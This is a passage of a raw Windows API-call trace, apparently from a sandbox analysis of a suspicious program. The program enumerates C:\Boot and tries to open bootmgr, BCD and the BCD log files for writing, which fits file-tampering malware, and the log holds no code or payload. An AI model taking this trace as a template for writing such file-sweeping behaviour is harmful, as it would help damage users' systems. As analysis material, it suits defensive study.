dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x6e, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a638, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x6e, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="48", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧곹 ⺊Ābc붼聐̧㑍Ā̧襐\x07̧비聐곹 곹 ows6.1-KB958488-v6001-x86.msu")) returned 0 [0082.360] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0082.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f648 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0082.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.360] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] AreFileApisANSI () returned 1 [0082.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot", lpUsedDefaultChar=0x0) returned 8 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.360] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.361] AreFileApisANSI () returned 1 [0082.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0082.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d6d8, cchWideChar=8 | out: lpWideCharStr="C:\\Boot") returned 8 [0082.361] CreateFileW (lpFileName="C:\\Boot" (normalized: "c:\\boot"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.361] GetLastError () returned 0x5 [0082.361] GetLastError () returned 0x5 [0082.361] SetLastError (dwErrCode=0x5) [0082.361] GetLastError () returned 0x5 [0082.361] SetLastError (dwErrCode=0x5) [0082.361] GetLastError () returned 0x5 [0082.361] SetLastError (dwErrCode=0x5) [0082.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0082.361] AreFileApisANSI () returned 1 [0082.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.361] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0082.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x7d540, cchWideChar=8 | out: lpWideCharStr="C:\\Boot") returned 8 [0082.361] CreateFileW (lpFileName="C:\\Boot" (normalized: "c:\\boot"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.361] GetLastError () returned 0x5 [0082.361] GetLastError () returned 0x5 [0082.362] SetLastError (dwErrCode=0x5) [0082.362] GetLastError () returned 0x5 [0082.362] SetLastError (dwErrCode=0x5) [0082.362] GetLastError () returned 0x5 [0082.362] SetLastError (dwErrCode=0x5) [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.362] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.362] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.362] FindFirstFileExW (in: lpFileName="C:\\Boot\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78e50 [0082.362] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9d311c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef9d311c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.362] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xd36fe848, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xd36fe848, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.362] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.363] AreFileApisANSI () returned 1 [0082.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD", lpUsedDefaultChar=0x0) returned 12 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.363] AreFileApisANSI () returned 1 [0082.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0082.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x5cb40 [0082.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cb40, cchWideChar=12 | out: lpWideCharStr="C:\\Boot\\BCD") returned 12 [0082.363] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.363] GetLastError () returned 0x20 [0082.363] GetLastError () returned 0x20 [0082.363] SetLastError (dwErrCode=0x20) [0082.363] GetLastError () returned 0x20 [0082.363] SetLastError (dwErrCode=0x20) [0082.364] GetLastError () returned 0x20 [0082.364] SetLastError (dwErrCode=0x20) [0082.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.364] AreFileApisANSI () returned 1 [0082.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0082.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x18) returned 0x5cb40 [0082.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cb40, cchWideChar=12 | out: lpWideCharStr="C:\\Boot\\BCD") returned 12 [0082.364] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.364] GetLastError () returned 0x20 [0082.364] GetLastError () returned 0x20 [0082.364] SetLastError (dwErrCode=0x20) [0082.364] GetLastError () returned 0x20 [0082.364] SetLastError (dwErrCode=0x20) [0082.364] GetLastError () returned 0x20 [0082.364] SetLastError (dwErrCode=0x20) [0082.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.364] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.365] AreFileApisANSI () returned 1 [0082.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\BCD.LOG", lpUsedDefaultChar=0x0) returned 16 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.365] AreFileApisANSI () returned 1 [0082.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0082.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\Boot\\BCD.LOG") returned 16 [0082.365] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.366] GetLastError () returned 0x20 [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.366] AreFileApisANSI () returned 1 [0082.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0082.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=16 | out: lpWideCharStr="C:\\Boot\\BCD.LOG") returned 16 [0082.366] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.366] GetLastError () returned 0x20 [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] GetLastError () returned 0x20 [0082.366] SetLastError (dwErrCode=0x20) [0082.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.366] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0082.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0082.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0082.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.367] AreFileApisANSI () returned 1 [0082.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\BCD.LOG1", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 